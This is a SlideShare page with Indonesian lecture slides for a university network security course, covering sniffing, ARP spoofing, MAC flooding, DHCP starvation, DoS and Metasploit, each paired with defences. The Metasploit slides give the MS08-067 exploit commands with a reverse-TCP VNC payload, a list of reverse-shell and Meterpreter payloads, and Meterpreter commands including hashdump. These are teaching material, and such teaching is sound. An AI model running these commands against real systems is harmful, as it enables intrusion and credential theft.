SlideShare a Scribd company logo
1 of 45
Download to read offline
1
Keamanan Jaringan
22. Sniffing
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
2
2
Sniffing
Asep
login:
asep
passwd:
########
SNIFFER
Server
3
SNIFFING
• Sniffing merupakan usaha untuk membaca dan menganalisa paket
yang lewat di jaringan menggunakan program packet sniffing
• Mengendus
• penyadapan
3
4
Sniffing - Teori
•Mesin yang terhubung ke jaringan dapat mendengarkan semua
paket/data di jaringan
•Promiscuous Mode
•Network Interface menangkap semua data
•Termasuk data yang tidak ditujukan kepadanya
4
5
Paket/Data yang ditangkap
• Trafik Syslog
• Trafik Web
• Email
• Dll
• Satu Jaringan / LAN
1. Data
2. Username
3. Password
4. Credit card
5
ekstrak
6
Protokol target
• http
• Pop
• IMAP
• SMTP
• NMTP
• FTP
• Telnet
• Rlogin
• dll
6
7
Keamanan Jaringan
23. Teknik Sniffing
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
8
Hardware Protocol Analyzer
• Perangkat
monitoring
jaringan
8
9
• SPAN Port pada
router Cisco
• Mirroring
semua paket
9
SPAN Port Cisco
10
Teknik Sniffing
• ARP Spoofing
• MAC Flooding
• DNS Poisoning
• DHCP starvation attack
• Switch Port Stealing
• dll
10
11
• Membanjiri Switch dengan alamat MAC palsu
• Tabel CAM : Mapping MAC --> Port
• Broadcast
• Tools: Macof, Dsniff
• Defend: Fitur Cisco Port Security, membatasi Mac Address pd port
11/
Mac Flooding
12
• Membanjiri DHCP Server dgn DHCP request
• Korban tidak dapat IP
• Rogue DHCP/ DHCP palsu
• Tools: gobbler, dhcpstarv, yersinia
• Defend: fitur Port Security, fitur DHCP Snooping
12
DHCP Starvation Attack
13
Keamanan Jaringan
24. ARP Spoofing
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
14
• Merubah tabel ARP pada switch
• Menyadap paket yang ditujukan ke komputer korban
• Tools: Cain & Abel, WinARP attacker, Ufasoft Sniff
• Defend:Dynamic ARP Inspection, (DHCP Snooping)
• Deteksi: XArp
14
ARP Spoofing
15
• Merubah MAC , Cloning MAC
• Tools: SMAC
• Defend: DHCP Snooping Binding Table, Dynamic ARP Inspection, IP
source guard, Enkripsi
• DNS Poisoning: Merubah DNS
• Trafik Internet diarahkan ke web palsu
• Defend: DNSSec, SSL, Tabel Static ARP & IP, Enkripsi
15
MAC Spoofing
16
Contoh Hasil Sniffing
16
17
• Wireshark
• SteelCentral Packet Analyzer
• TCPdump/Windump
• Capsa Network Analyzer
• OmniPeek Network Analyzer
• Observer
• Sniff-O-Matic
• Colasoft Packet Builder
• RSA NetWitness Investigator
• Wi.Cap Network Sniffer Pro
• FaceNiff
17
Tools Monitoring Trafik Jaringan
18
•Nmap
•Promqry UI
•IDS
•HP Performance Insight
18
Deteksi Sniffing
19
Keamanan Jaringan
25. Metasploit
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
20
• HD Moore
• Defcon 12 – 2004
• exploit frameworks
• Tools untuk menguji keamanan sistem
• http://www.metasploit.com
20
Hacking Like in the movies
21
• Vulnerabilities celah keamanan yang dapat dieksploitasi
• exploit script/kode yang kita kirimkan ke komputer target utk
memudahkan kita memasang payload
• payload scripts yang kita gunakan untuk menjalankan berbagai
perintah di komputer target.
21
Glossary
22
Langkah
• Scanning à celah keamanan
• Pilih sebuah Target
• Pilih sebuah Exploit
• Pilih sebuah Payload
• Jalankan exploit
22
23
Payload
• Menambahkan user baru
• Memasang backdoors,
• Menginstall sebuah aplikasi baru pada komputer target
• Mematikan komputer
23
24
Setiap Sistem Unik
• Beda operating systems (OS), beda exploit
• Sistem operasi sama tapi beda services, dan proces dibutuhkan
serangan yang berbeda
• Perlu memasang exploit yang pas dengan vulnerabilities
24
25
Keamanan Jaringan
26.Mencari Celah Keamanan
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
26
• Mencari celah keamanan
• Nessus atau “Nmap --script vuln”
• Daftar celah keamanan atau patch yang belum dipasang
• Tingkatan Celah keamanan
• Critical
• High
• Medium
• low26
Mencari Celah Keamanan
27
• remote access
• Secure shell (SSH)
• Telnet
• file transfer protocol (FTP)
• PCAnywhere
• virtual network computing (VNC)
27
Target
28
• Contoh Vulnerability
hasil scanning dgn
nmap
• Ditemukan celah
keamanan CVE-2011-
3192
28
29
• Critical
• MS08-067
• MS09-001
29
Nessus
30
Database Celah Keamanan
• Common Vulnerabilities and Exposures (CVE),
• Open Source Vulnerability Database (OSVDB)
• Insecure.org
• Microsoft patch MS08-067 has not been installed on the target
machine.
• missing Microsoft patch MS09-001
30
31
Keamanan Jaringan
27. Payload
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
32
• msfconsole :
• number of
exploits,
• payloads,
• encoders,
• msfupdate
• search ms08-067
32
Msfconsole
33
• use exploit/windows/smb/ms08_067_netapi
• show payloads
• set payload windows/vncinject/reverse_tcp
• set RHOST 192.168.18.131 : RHOST alamat IP Target
• set LHOST 192.168.18.130 : LHOST (local host) alamat IP Penyerang
• show options
• exploit
33
Pilih Payload
34
1. Jalankan Metasploit melalui terminal : msf> msfconsole
2. Jalankan perintah “search” untuk mencari exploits yang sesuai
dengan celah keamanan pada komputer target
msf> search cve (celah keamanan)/service yg tersedia
3. Gunakan perintah “use” untuk memilih exploit
4. msf> use exploit_name
5. Gunakan perintah “show payloads” untuk menampolkan payload
yang bisa digunakan
6. msf> show payloads
34
Langkah penyerangan
35
7. Gunakan perintah “set” untuk memilih payload:
msf> set nama_payload
8. Gunakan perintah “show options” untuk menampilkan pilihan
yang tersedia
msf> show options
9. Jalankan perintah “set” untuk memilih opsi yang tersedia
10. msf> set pilihan_opsi
11. Jalankan perintah “exploit” untuk menjalankan exploit
12. msf> “exploit”
35
Langkah memilih payload
36
Jenis Payload
• Windows/adduser
• Windows/exec
• Windows/shell_bind_tcp
• Windows/shell_reverse_tcp
• Windows/meterpreter/bind_tcp
• Windows/Meterpreter/reverse_tcp
• Windows/vncinject/bind_tcp
• Windows/vncinject/reverse_tcp
• Tambah user
• Jalankan file .exe
• Menjalankan shell di komputer
target
• installs meterpreter
• Install vnc
36
37
Meterpreter
• Windows cmd.exe; Linux
/bin/sh
• migrate
• cat
• download
• upload
• edit
• execute
• Kill
• cd”,
• “ls”,
• “ps”,
• “shutdown”,
• “mkdir”,
• “pwd”,
• “ifconfig”
• hashdump
37
38
Keamanan Jaringan
28. DoS Attack
Setia Juli Irzal Ismail
D3 Teknologi Komputer – Fakultas Ilmu Terapan
Telkom University.
39
• serangan dengan cara menghabiskan sumber daya (resource)
• tidak dapat menjalankan fungsinya dengan benar
• Lemot/ down
• Availability
• Caranya: membanjiri dengan data
39
Denial of Service
40
Jenis DoS
• Bandwidth Flooding
• Syn Flooding
• Icmp Flooding
• Peer-to-peer Attack
• Application level Flood Attack
• Permanen DoS Attack
• Distributed Reflection DoS (DrDoS)
40
41
• Pandora Toolkit
• Dereil, Hoic
• DosHttp, BanglaDos
• Andosid
• LOIC
41
Tools Dos
42
• Distributed Denial of Service
• Serangan DoS secara serentak, bersama-sama, terkoordinir
• Banyak penyerang
• Satu Target
• Botnet
• Blackshades NET,Chytosia Botnet, AndromedaBot, PlugBot,
42
DDoS
43
• Penambahan Resource à load balancing
• Matikan Layanan
• Alihkan Trafik à Honeypot
• Drop request
• Firewall
• IDS
43
Penanganan DoS
44
Materi Berikutnya:
Keamanan Wireless
44
Terima Kasih
45
Buku Bacaan Wajib (BW)
Engebretson, P. (2011). The Basic of Hacking and Penetration Testing:
Ethical Hacking and Penetration Testing Made Easy. Syngress.
Stallings, W. (2010). Network Security Essentials:Applications and
Standards 4th Edition. Prentice Hall.
Buku Bacaan Anjuran (BA)
Harris, S. (2010). CISSP All in One Exam Guide, 5th Edition. McGraw Hill.
Walker, M. (2010). CEH Certified Ethical Hacker All-in-One. McGraw Hill.
45
Referensi

More Related Content

What's hot

Makalah tentang firewall
Makalah tentang firewallMakalah tentang firewall
Makalah tentang firewallRizky Purnama
 
Laporan Praktikum Web dengan PHP
Laporan Praktikum Web dengan PHPLaporan Praktikum Web dengan PHP
Laporan Praktikum Web dengan PHPOkta Riveranda
 
Kriptografi, Enkripsi dan Dekripsi
Kriptografi, Enkripsi dan DekripsiKriptografi, Enkripsi dan Dekripsi
Kriptografi, Enkripsi dan DekripsiFarichah Riha
 
5 Macam Metode Dasar Kriptografi
5 Macam Metode Dasar Kriptografi5 Macam Metode Dasar Kriptografi
5 Macam Metode Dasar KriptografiRoziq Bahtiar
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemDan H
 
INTERAKSI MANUSIA DAN KOMPUTER
INTERAKSI MANUSIA DAN KOMPUTERINTERAKSI MANUSIA DAN KOMPUTER
INTERAKSI MANUSIA DAN KOMPUTERAndhi Pratama
 
Soal Latihan OSI Layer
Soal Latihan OSI LayerSoal Latihan OSI Layer
Soal Latihan OSI LayerDenny Yahya
 
Ppt dns server
Ppt dns serverPpt dns server
Ppt dns serverMAFauzan
 
Pertemuan 2-pemecahan-masalah-ai
Pertemuan 2-pemecahan-masalah-aiPertemuan 2-pemecahan-masalah-ai
Pertemuan 2-pemecahan-masalah-aiwillyhayon
 
Deadlock pada sistem operasi
Deadlock pada sistem operasiDeadlock pada sistem operasi
Deadlock pada sistem operasiAyu Arri Andanni
 

What's hot (20)

Modul metasploit
Modul metasploitModul metasploit
Modul metasploit
 
Makalah tentang firewall
Makalah tentang firewallMakalah tentang firewall
Makalah tentang firewall
 
Laporan Praktikum Web dengan PHP
Laporan Praktikum Web dengan PHPLaporan Praktikum Web dengan PHP
Laporan Praktikum Web dengan PHP
 
Jurnal metasploit(revisi)
Jurnal metasploit(revisi)Jurnal metasploit(revisi)
Jurnal metasploit(revisi)
 
Kriptografi, Enkripsi dan Dekripsi
Kriptografi, Enkripsi dan DekripsiKriptografi, Enkripsi dan Dekripsi
Kriptografi, Enkripsi dan Dekripsi
 
01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload
 
Chapter 5 firewall
Chapter 5 firewallChapter 5 firewall
Chapter 5 firewall
 
5 Macam Metode Dasar Kriptografi
5 Macam Metode Dasar Kriptografi5 Macam Metode Dasar Kriptografi
5 Macam Metode Dasar Kriptografi
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment systemWorkshop 101 - Penetration testing & Vulnerability assessment system
Workshop 101 - Penetration testing & Vulnerability assessment system
 
INTERAKSI MANUSIA DAN KOMPUTER
INTERAKSI MANUSIA DAN KOMPUTERINTERAKSI MANUSIA DAN KOMPUTER
INTERAKSI MANUSIA DAN KOMPUTER
 
Keamanan sistem operasi
Keamanan sistem operasiKeamanan sistem operasi
Keamanan sistem operasi
 
Ppt proxy
Ppt proxyPpt proxy
Ppt proxy
 
Soal Latihan OSI Layer
Soal Latihan OSI LayerSoal Latihan OSI Layer
Soal Latihan OSI Layer
 
Sistem terdistribusi
Sistem terdistribusiSistem terdistribusi
Sistem terdistribusi
 
Kriptografi
KriptografiKriptografi
Kriptografi
 
Ppt dns server
Ppt dns serverPpt dns server
Ppt dns server
 
Pertemuan 2-pemecahan-masalah-ai
Pertemuan 2-pemecahan-masalah-aiPertemuan 2-pemecahan-masalah-ai
Pertemuan 2-pemecahan-masalah-ai
 
Makalah keamanan jaringan
Makalah keamanan jaringanMakalah keamanan jaringan
Makalah keamanan jaringan
 
Deadlock pada sistem operasi
Deadlock pada sistem operasiDeadlock pada sistem operasi
Deadlock pada sistem operasi
 
Firewall
FirewallFirewall
Firewall
 

Similar to Keamanan Jaringan Sniffing

Persentasi Modul Password Untuk Mata Kuliah Keamanan Jaringan
Persentasi Modul Password Untuk Mata Kuliah Keamanan JaringanPersentasi Modul Password Untuk Mata Kuliah Keamanan Jaringan
Persentasi Modul Password Untuk Mata Kuliah Keamanan Jaringankuntaannapakaja
 
Modul 4 - Keamanan Jaringan Komputer
Modul 4 - Keamanan Jaringan KomputerModul 4 - Keamanan Jaringan Komputer
Modul 4 - Keamanan Jaringan Komputerjagoanilmu
 
Pertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiPertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiRoziq Bahtiar
 
pembahasan kemanan komputer
pembahasan kemanan komputerpembahasan kemanan komputer
pembahasan kemanan komputerGisnu Gintara
 
Hardening Linux Server Security
Hardening Linux Server SecurityHardening Linux Server Security
Hardening Linux Server SecurityIlham Kurniawan
 
Merancang bangun dan_menganalisa_wide_area_network
Merancang bangun dan_menganalisa_wide_area_networkMerancang bangun dan_menganalisa_wide_area_network
Merancang bangun dan_menganalisa_wide_area_networkRoyon Reys Rumapea
 
Evaluasi Keamanan Sistem Informasi
Evaluasi Keamanan Sistem InformasiEvaluasi Keamanan Sistem Informasi
Evaluasi Keamanan Sistem InformasiWildan Maulana
 
CyberOps Associate Modul 24 Technologies and Protocols
CyberOps Associate Modul 24 Technologies and ProtocolsCyberOps Associate Modul 24 Technologies and Protocols
CyberOps Associate Modul 24 Technologies and ProtocolsPanji Ramadhan Hadjarati
 
Hacking and-defense
Hacking and-defenseHacking and-defense
Hacking and-defenseaw222
 
Bab 14 Pengantar Teknologi Informasi Keamanan Jaringan
Bab 14 Pengantar Teknologi Informasi Keamanan JaringanBab 14 Pengantar Teknologi Informasi Keamanan Jaringan
Bab 14 Pengantar Teknologi Informasi Keamanan JaringanStephen Setiawan
 
Network security
Network securityNetwork security
Network securitymho3yank
 
Sistem keamanan jaringan komputer
Sistem keamanan jaringan komputerSistem keamanan jaringan komputer
Sistem keamanan jaringan komputerdohar2
 
Pertemuan13 exploitasikeamanan ok
Pertemuan13 exploitasikeamanan okPertemuan13 exploitasikeamanan ok
Pertemuan13 exploitasikeamanan okRoziq Bahtiar
 
Keamanan jaringan komputer
Keamanan jaringan komputerKeamanan jaringan komputer
Keamanan jaringan komputerseolangit2
 
Bab3 protocol secured
Bab3 protocol securedBab3 protocol secured
Bab3 protocol securedindra47
 

Similar to Keamanan Jaringan Sniffing (20)

Keamanan jaringan komputer kelompok 2
Keamanan jaringan komputer kelompok 2Keamanan jaringan komputer kelompok 2
Keamanan jaringan komputer kelompok 2
 
Persentasi Modul Password Untuk Mata Kuliah Keamanan Jaringan
Persentasi Modul Password Untuk Mata Kuliah Keamanan JaringanPersentasi Modul Password Untuk Mata Kuliah Keamanan Jaringan
Persentasi Modul Password Untuk Mata Kuliah Keamanan Jaringan
 
Ctf del upload
Ctf del uploadCtf del upload
Ctf del upload
 
Modul 4 - Keamanan Jaringan Komputer
Modul 4 - Keamanan Jaringan KomputerModul 4 - Keamanan Jaringan Komputer
Modul 4 - Keamanan Jaringan Komputer
 
Pertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasiPertemuan03 evaluasikeamanansisteminformasi
Pertemuan03 evaluasikeamanansisteminformasi
 
pembahasan kemanan komputer
pembahasan kemanan komputerpembahasan kemanan komputer
pembahasan kemanan komputer
 
KK_18_TKJ
KK_18_TKJKK_18_TKJ
KK_18_TKJ
 
Hardening Linux Server Security
Hardening Linux Server SecurityHardening Linux Server Security
Hardening Linux Server Security
 
Merancang bangun dan_menganalisa_wide_area_network
Merancang bangun dan_menganalisa_wide_area_networkMerancang bangun dan_menganalisa_wide_area_network
Merancang bangun dan_menganalisa_wide_area_network
 
Evaluasi Keamanan Sistem Informasi
Evaluasi Keamanan Sistem InformasiEvaluasi Keamanan Sistem Informasi
Evaluasi Keamanan Sistem Informasi
 
CyberOps Associate Modul 24 Technologies and Protocols
CyberOps Associate Modul 24 Technologies and ProtocolsCyberOps Associate Modul 24 Technologies and Protocols
CyberOps Associate Modul 24 Technologies and Protocols
 
Hacking and-defense
Hacking and-defenseHacking and-defense
Hacking and-defense
 
Hacking and-defense
Hacking and-defenseHacking and-defense
Hacking and-defense
 
Bab 14 Pengantar Teknologi Informasi Keamanan Jaringan
Bab 14 Pengantar Teknologi Informasi Keamanan JaringanBab 14 Pengantar Teknologi Informasi Keamanan Jaringan
Bab 14 Pengantar Teknologi Informasi Keamanan Jaringan
 
Network security
Network securityNetwork security
Network security
 
Sistem keamanan jaringan komputer
Sistem keamanan jaringan komputerSistem keamanan jaringan komputer
Sistem keamanan jaringan komputer
 
Pertemuan13 exploitasikeamanan ok
Pertemuan13 exploitasikeamanan okPertemuan13 exploitasikeamanan ok
Pertemuan13 exploitasikeamanan ok
 
slide-share.pdf
slide-share.pdfslide-share.pdf
slide-share.pdf
 
Keamanan jaringan komputer
Keamanan jaringan komputerKeamanan jaringan komputer
Keamanan jaringan komputer
 
Bab3 protocol secured
Bab3 protocol securedBab3 protocol secured
Bab3 protocol secured
 

More from Setia Juli Irzal Ismail

More from Setia Juli Irzal Ismail (20)

slide-lp3i-final.pdf
slide-lp3i-final.pdfslide-lp3i-final.pdf
slide-lp3i-final.pdf
 
society50-jul-share.pdf
society50-jul-share.pdfsociety50-jul-share.pdf
society50-jul-share.pdf
 
57 slide presentation
57 slide presentation57 slide presentation
57 slide presentation
 
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom UniversityPanduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
 
Sosialisasi kurikulum2020
Sosialisasi kurikulum2020Sosialisasi kurikulum2020
Sosialisasi kurikulum2020
 
Welcoming maba 2020
Welcoming maba 2020Welcoming maba 2020
Welcoming maba 2020
 
Slide jul apcert agm 2016
Slide jul apcert agm 2016Slide jul apcert agm 2016
Slide jul apcert agm 2016
 
Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan
 
Kajian3 upload
Kajian3 uploadKajian3 upload
Kajian3 upload
 
1.pendahuluan sistem operasi
1.pendahuluan sistem operasi1.pendahuluan sistem operasi
1.pendahuluan sistem operasi
 
10 tk3193-ids
10 tk3193-ids10 tk3193-ids
10 tk3193-ids
 
09 vpn
09 vpn 09 vpn
09 vpn
 
17. representasi data 5 jul
17. representasi data 5   jul17. representasi data 5   jul
17. representasi data 5 jul
 
16. representasi data 4 jul
16. representasi data 4   jul16. representasi data 4   jul
16. representasi data 4 jul
 
15. representasi data 3 jul2
15. representasi data 3   jul215. representasi data 3   jul2
15. representasi data 3 jul2
 
Latihan6
Latihan6Latihan6
Latihan6
 
14. representasi data 2 upload
14. representasi data 2   upload14. representasi data 2   upload
14. representasi data 2 upload
 
3. memori jul
3. memori jul3. memori jul
3. memori jul
 
2. central processing unit jul
2. central processing unit jul2. central processing unit jul
2. central processing unit jul
 
01 sejarah perkembangan komputer-upload
01 sejarah perkembangan komputer-upload01 sejarah perkembangan komputer-upload
01 sejarah perkembangan komputer-upload
 

Recently uploaded

Kelompok 2 Karakteristik Negara Nigeria.pdf
Kelompok 2 Karakteristik Negara Nigeria.pdfKelompok 2 Karakteristik Negara Nigeria.pdf
Kelompok 2 Karakteristik Negara Nigeria.pdftsaniasalftn18
 
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdf
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdfKelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdf
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdfmaulanayazid
 
Membuat Strategi Penerapan Kurikulum Merdeka di dalam Kelas
Membuat Strategi Penerapan Kurikulum Merdeka di dalam KelasMembuat Strategi Penerapan Kurikulum Merdeka di dalam Kelas
Membuat Strategi Penerapan Kurikulum Merdeka di dalam KelasHardaminOde2
 
Lembar Observasi Pembelajaran di Kelas.docx
Lembar Observasi Pembelajaran di  Kelas.docxLembar Observasi Pembelajaran di  Kelas.docx
Lembar Observasi Pembelajaran di Kelas.docxbkandrisaputra
 
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptx
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptxPanduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptx
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptxsudianaade137
 
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptx
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptxBAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptx
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptxJamhuriIshak
 
Modul 1.2.a.8 Koneksi antar materi 1.2.pdf
Modul 1.2.a.8 Koneksi antar materi 1.2.pdfModul 1.2.a.8 Koneksi antar materi 1.2.pdf
Modul 1.2.a.8 Koneksi antar materi 1.2.pdfSitiJulaeha820399
 
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdf
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdfAKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdf
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdfTaqdirAlfiandi1
 
polinomial dan suku banyak kelas 11..ppt
polinomial dan suku banyak kelas 11..pptpolinomial dan suku banyak kelas 11..ppt
polinomial dan suku banyak kelas 11..pptGirl38
 
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxPPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxnerow98
 
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptx
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptxIPA Kelas 9 BAB 10 - www.ilmuguru.org.pptx
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptxErikaPuspita10
 
PEMIKIRAN POLITIK Jean Jacques Rousseau.pdf
PEMIKIRAN POLITIK Jean Jacques  Rousseau.pdfPEMIKIRAN POLITIK Jean Jacques  Rousseau.pdf
PEMIKIRAN POLITIK Jean Jacques Rousseau.pdfMMeizaFachri
 
Materi Pertemuan 6 Materi Pertemuan 6.pptx
Materi Pertemuan 6 Materi Pertemuan 6.pptxMateri Pertemuan 6 Materi Pertemuan 6.pptx
Materi Pertemuan 6 Materi Pertemuan 6.pptxRezaWahyuni6
 
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docx
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docxModul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docx
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docxherisriwahyuni
 
04-Gemelli.- kehamilan ganda- duo atau triplet
04-Gemelli.- kehamilan ganda- duo atau triplet04-Gemelli.- kehamilan ganda- duo atau triplet
04-Gemelli.- kehamilan ganda- duo atau tripletMelianaJayasaputra
 
alat-alat liturgi dalam Gereja Katolik.pptx
alat-alat liturgi dalam Gereja Katolik.pptxalat-alat liturgi dalam Gereja Katolik.pptx
alat-alat liturgi dalam Gereja Katolik.pptxRioNahak1
 
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024budimoko2
 
adap penggunaan media sosial dalam kehidupan sehari-hari.pptx
adap penggunaan media sosial dalam kehidupan sehari-hari.pptxadap penggunaan media sosial dalam kehidupan sehari-hari.pptx
adap penggunaan media sosial dalam kehidupan sehari-hari.pptxmtsmampunbarub4
 
Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)3HerisaSintia
 
MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptx
MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptxMODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptx
MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptxarnisariningsih98
 

Recently uploaded (20)

Kelompok 2 Karakteristik Negara Nigeria.pdf
Kelompok 2 Karakteristik Negara Nigeria.pdfKelompok 2 Karakteristik Negara Nigeria.pdf
Kelompok 2 Karakteristik Negara Nigeria.pdf
 
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdf
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdfKelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdf
Kelompok 1 Bimbingan Konseling Islami (Asas-Asas).pdf
 
Membuat Strategi Penerapan Kurikulum Merdeka di dalam Kelas
Membuat Strategi Penerapan Kurikulum Merdeka di dalam KelasMembuat Strategi Penerapan Kurikulum Merdeka di dalam Kelas
Membuat Strategi Penerapan Kurikulum Merdeka di dalam Kelas
 
Lembar Observasi Pembelajaran di Kelas.docx
Lembar Observasi Pembelajaran di  Kelas.docxLembar Observasi Pembelajaran di  Kelas.docx
Lembar Observasi Pembelajaran di Kelas.docx
 
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptx
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptxPanduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptx
Panduan Substansi_ Pengelolaan Kinerja Kepala Sekolah Tahap Pelaksanaan.pptx
 
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptx
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptxBAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptx
BAHAN SOSIALISASI PPDB SMA-SMK NEGERI DISDIKSU TP. 2024-2025 REVISI.pptx
 
Modul 1.2.a.8 Koneksi antar materi 1.2.pdf
Modul 1.2.a.8 Koneksi antar materi 1.2.pdfModul 1.2.a.8 Koneksi antar materi 1.2.pdf
Modul 1.2.a.8 Koneksi antar materi 1.2.pdf
 
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdf
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdfAKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdf
AKSI NYATA Strategi Penerapan Kurikulum Merdeka di Kelas (1).pdf
 
polinomial dan suku banyak kelas 11..ppt
polinomial dan suku banyak kelas 11..pptpolinomial dan suku banyak kelas 11..ppt
polinomial dan suku banyak kelas 11..ppt
 
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxPPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
 
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptx
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptxIPA Kelas 9 BAB 10 - www.ilmuguru.org.pptx
IPA Kelas 9 BAB 10 - www.ilmuguru.org.pptx
 
PEMIKIRAN POLITIK Jean Jacques Rousseau.pdf
PEMIKIRAN POLITIK Jean Jacques  Rousseau.pdfPEMIKIRAN POLITIK Jean Jacques  Rousseau.pdf
PEMIKIRAN POLITIK Jean Jacques Rousseau.pdf
 
Materi Pertemuan 6 Materi Pertemuan 6.pptx
Materi Pertemuan 6 Materi Pertemuan 6.pptxMateri Pertemuan 6 Materi Pertemuan 6.pptx
Materi Pertemuan 6 Materi Pertemuan 6.pptx
 
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docx
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docxModul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docx
Modul Ajar Bahasa Indonesia - Menulis Puisi Spontanitas - Fase D.docx
 
04-Gemelli.- kehamilan ganda- duo atau triplet
04-Gemelli.- kehamilan ganda- duo atau triplet04-Gemelli.- kehamilan ganda- duo atau triplet
04-Gemelli.- kehamilan ganda- duo atau triplet
 
alat-alat liturgi dalam Gereja Katolik.pptx
alat-alat liturgi dalam Gereja Katolik.pptxalat-alat liturgi dalam Gereja Katolik.pptx
alat-alat liturgi dalam Gereja Katolik.pptx
 
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024
Petunjuk Teknis Aplikasi Pelaksanaan OSNK 2024
 
adap penggunaan media sosial dalam kehidupan sehari-hari.pptx
adap penggunaan media sosial dalam kehidupan sehari-hari.pptxadap penggunaan media sosial dalam kehidupan sehari-hari.pptx
adap penggunaan media sosial dalam kehidupan sehari-hari.pptx
 
Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)
 
